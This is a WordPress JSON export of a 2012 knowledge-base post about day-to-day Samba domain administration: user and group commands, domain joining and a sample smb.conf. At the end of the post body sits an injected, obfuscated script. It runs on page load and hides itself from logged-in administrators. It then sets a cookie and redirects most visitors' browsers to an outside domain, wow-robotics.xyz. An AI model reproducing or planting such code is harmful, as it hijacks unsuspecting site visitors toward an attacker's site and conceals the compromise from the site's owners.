{"id":391,"date":"2012-04-15T23:35:29","date_gmt":"2012-04-15T15:35:29","guid":{"rendered":"http:\/\/www.q-station.net\/kb\/?p=391"},"modified":"2012-04-15T23:45:14","modified_gmt":"2012-04-15T15:45:14","slug":"daily-operation-for-samba","status":"publish","type":"post","link":"https:\/\/kb.q-station.net\/index.php\/2012\/04\/15\/daily-operation-for-samba\/","title":{"rendered":"Daily operation for Samba"},"content":{"rendered":"<h1>User operation<\/h1>\n<p>To add\/delete\/modify user in the DOMAIN you could using<\/p>\n<ul>\n<li>Running USRMGR.exe in a domain workstation with privilege user<\/li>\n<li><strong>pdbedit<\/strong><\/li>\n<li><strong>net sam set<\/strong>, e.g, force user to change their password<\/li>\n<\/ul>\n<h1>Group operation<\/h1>\n<ul>\n<li>Running USRMGR.exe in a domain workstation with privilege user<\/li>\n<li><strong>net rpc group<\/strong><\/li>\n<\/ul>\n<h1>Windows joining the domain<\/h1>\n<p>Windows machine could join the domain as usual, there are no special precaution.<\/p>\n<h1>Samba joining the domain<\/h1>\n<p>Some notes for Samba domain member server.  Since, Samba require physical user passwd entries exist for correct operation.<\/p>\n<p>To let samba joining the domain, the samba member server should<\/p>\n<ul>\n<li>install nss_ldap &#038; configure the member server could get the user\/group entries from PDC, testing it with <strong>genent group, genent passwd<\/strong><\/li>\n<li>sample smb.conf\n<pre>\r\n[global]\r\n  username map = \/etc\/samba\/smbusers\r\n  security=domain\r\n  workgroup = EXAMPLE\r\n  password server = *\r\n  netbios name = server1\r\n  wins server = 192.168.1.1\r\n  domain master = no\r\n  local master = no\r\n  preferred master = no\r\n  os level = 1\r\n  interfaces = eth0 lo\r\n  bind interfaces only = yes\r\n  name resolve order = wins lmhosts hosts bcast\r\n  winbind enum groups = yes\r\n  winbind enum users = yes\r\n  passdb backend = tdbsam:\/etc\/samba\/private\/passdb.tdb\r\n  idmap backend = tdb\r\n  idmap uid = 500001-600000\r\n  idmap gid = 500001-600000\r\n  idmap config EXAMPLE : backend = nss\r\n  idmap config EXAMPLE : range = 50000-500000 \r\n<\/pre>\n<li>In some extents, the local passdb backend allow the member server having local user beside of the users from domain.<\/li>\n<li><strong>net sam<\/strong> could help to create local group<\/li>\n<li><strong>net join<\/strong><\/li>\n<\/ul>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>User operation To add\/delete\/modify user in the DOMAIN you could using Running USRMGR.exe in a domain workstation with privilege user pdbedit net sam set, e.g, force user to change their password Group operation Running USRMGR.exe in a domain workstation with privilege user net rpc group Windows joining the domain Windows machine could join the domain as usual, there are no special precaution. Samba joining the domain Some notes for Samba domain member server. Since, Samba require physical user passwd entries exist for correct operation. To let samba joining the domain, the samba member server should install nss_ldap &#038; configure the <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[52,27,8],"tags":[53],"_links":{"self":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/391"}],"collection":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/comments?post=391"}],"version-history":[{"count":12,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/391\/revisions"}],"predecessor-version":[{"id":410,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/391\/revisions\/410"}],"wp:attachment":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/media?parent=391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/categories?post=391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/tags?post=391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}